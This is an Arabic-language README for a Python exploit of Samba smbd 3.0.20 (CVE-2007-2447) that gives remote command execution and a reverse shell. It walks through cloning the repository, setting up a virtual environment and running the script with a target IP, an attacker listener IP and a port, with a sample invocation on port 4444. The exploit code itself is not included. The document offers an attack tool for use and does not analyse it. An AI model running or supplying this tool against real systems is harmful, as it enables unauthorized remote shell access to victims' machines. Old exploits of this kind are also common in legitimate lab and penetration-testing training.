
استغلال Python لـ Samba smbd 3.0.20 (CVE-2007-2447) يتيح تنفيذ أوامر عن بُعد وربط شل عكسي عبر طلبات SMB مصنوعة.
يحتوي هذا المستودع على استغلال لـ Samba smbd 3.0.20 (CVE-2007-2447) يسمح بتنفيذ أوامر عن بُعد عبر طلبات SMB مصمّمة.
يتطلب هذا الاستغلال Python 3 وبعض التبعيات. يُوصى بإعداد بيئة افتراضية قبل تشغيل الاستغلال.
استنساخ المستودع:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
إنشاء بيئة افتراضية لـ Python:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(يمكن لمستخدمي ويندوز التنشيط باستخدام: smb_env\Scripts\activate)
تثبيت التبعيات المطلوبة:
pip install -r requirements.txt
بعد إعداد البيئة الافتراضية، يمكنك تنفيذ الاستغلال باستخدام الصيغة التالية:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: عنوان IP للجهاز المستهدف (الضحية).-a / --attacker: عنوان IP للمستمع الخاص بالمهاجم.-p / --port: المنفذ لإنشاء اتصال الصدفة العكسية.بعد الانتهاء، قم بإلغاء تنشيط البيئة الافتراضية باستخدام:
deactivate